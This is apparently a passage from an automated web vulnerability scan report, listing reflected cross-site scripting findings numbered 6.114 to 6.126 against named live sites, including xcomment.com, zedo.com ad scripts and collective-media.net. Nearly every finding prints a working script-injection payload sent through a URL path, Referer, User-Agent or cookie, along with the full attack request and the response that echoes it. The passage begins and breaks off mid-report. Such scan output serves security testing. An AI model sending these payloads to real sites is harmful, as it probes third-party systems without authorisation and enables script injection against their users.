User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38718

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<td width="90%" height="29" class="maintitletext">Favicon.icodb980<script>alert(1)</script>03baad4d242's Profile </td>
...[SNIP]...

6.114. http://www.xcomment.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3234f'><script>alert(1)</script>783c7457092 was submitted in the REST URL parameter 1. This input was echoed as 3234f\'><script>alert(1)</script>783c7457092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3234f'><script>alert(1)</script>783c7457092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38748

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<input name='user' type='hidden' value='Favicon.ico3234f\'><script>alert(1)</script>783c7457092' />
...[SNIP]...

6.115. http://www.xcomment.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96af4"><script>alert(1)</script>9b2bc11874d was submitted in the REST URL parameter 1. This input was echoed as 96af4\"><script>alert(1)</script>9b2bc11874d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico96af4"><script>alert(1)</script>9b2bc11874d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38748

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<form name="jumpcategory" method="post" action="http://www.xcomment.com/Favicon.ico96af4\"><script>alert(1)</script>9b2bc11874d&pg=1">
...[SNIP]...

6.116. http://www.xcomment.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload abab7</title><script>alert(1)</script>1f94ac6ba59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoabab7</title><script>alert(1)</script>1f94ac6ba59 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38798

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<title>Favicon.icoabab7</title><script>alert(1)</script>1f94ac6ba59's MySpace Graphics and Pictures for MySpace Comments</title>
...[SNIP]...

6.117. http://www.boomboomflicks.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.boomboomflicks.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df75'-alert(1)-'66875c09aad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boomboomflicks.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 6df75'-alert(1)-'66875c09aad

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=e56256e5ef9fd75705f6b439f10a1357; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 133244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<html><title>Porn Tube
...[SNIP]...

...[SNIP]...

6.118. http://www.freshpreservingstore.com/favicon.ico [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.freshpreservingstore.com
Path:	/favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cade9--><script>alert(1)</script>ab1eeaf5a81 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3cade9--><script>alert(1)</script>ab1eeaf5a81
Host: www.freshpreservingstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 May 2011 11:40:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8214
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSBSCSBB=FHEFGOODLANAEDBNNEIAHCGH; path=/
Cache-control: private
Set-Cookie: BIGipServerweb_freshpreservingstore_pool=2751467692.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...
<script>alert(1)</script>ab1eeaf5a81 -->
...[SNIP]...

6.119. http://www.prosolutionpills.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 66d34--><script>alert(1)</script>7df68a51f3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=66d34--><script>alert(1)</script>7df68a51f3f

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:20:07 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=eb516b55614f10b9add26227e7a82a7a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:20:07 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:20:07 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<script>alert(1)</script>7df68a51f3f -->
...[SNIP]...

6.120. http://www.tradearca.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tradearca.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e30f9<script>alert(1)</script>15193fec68d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=e30f9<script>alert(1)</script>15193fec68d

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:33:18 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40919
Content-Type: text/html
Expires: Mon, 02 May 2011 11:32:18 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=KDIHKEODGOIPMJMEIJNJBCLM; path=/
Cache-control: False

<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<br>http://www.google.com/search?hl=en&q=e30f9<script>alert(1)</script>15193fec68d

<br>
...[SNIP]...

6.121. http://www.youngtubeclub.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youngtubeclub.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe4b'-alert(1)-'f2df1d0d80e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youngtubeclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 4fe4b'-alert(1)-'f2df1d0d80e

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=7894c473c8235a927af5f4d0ccb84993; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 65679

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Young Tube Club - Free young teen porn sex videos</title>
<meta name="d
...[SNIP]...

...[SNIP]...

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10e64"-alert(1)-"2c88e7eb1d8 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:42:08 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=67
Expires: Tue, 03 May 2011 15:43:15 GMT
Date: Tue, 03 May 2011 15:42:08 GMT
Connection: close
Content-Length: 2347

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8;z="+Math.random();}

if(zzuid=='unknown')zzuid='@HD0VAoBADQAAGbr14QAAAAA~050311';

var zzhasAd=undefined;

var zzStr = "s=1;u=@HD0VAoBADQAAGbr14QAAAA
...[SNIP]...

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6d18'-alert(1)-'bdf7ec3c1de was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:42:08 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:42:08 GMT
Connection: close
Content-Length: 2347

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de;z="+Math.random();}

if(zzuid=='unknown')zzuid='@HD0VAoBADQAAGbr14QAAAAA
...[SNIP]...

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74d0c"-alert(1)-"608dd61467a was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:18 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCus
...[SNIP]...
zuid='-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a';

var zzhasAd=undefined;

var zzStr = "s=1;u=-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.125. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_lee/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722dd"%3balert(1)//f296103105c was submitted in the cli cookie. This input was echoed as 722dd";alert(1)//f296103105c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c722dd"%3balert(1)//f296103105c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:29 GMT
Content-Length: 8193

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11fda490648f83c722dd";alert(1)//f296103105c&seg_code=noseg&ord=1304437409",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

6.126. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_lee/

Issue detail

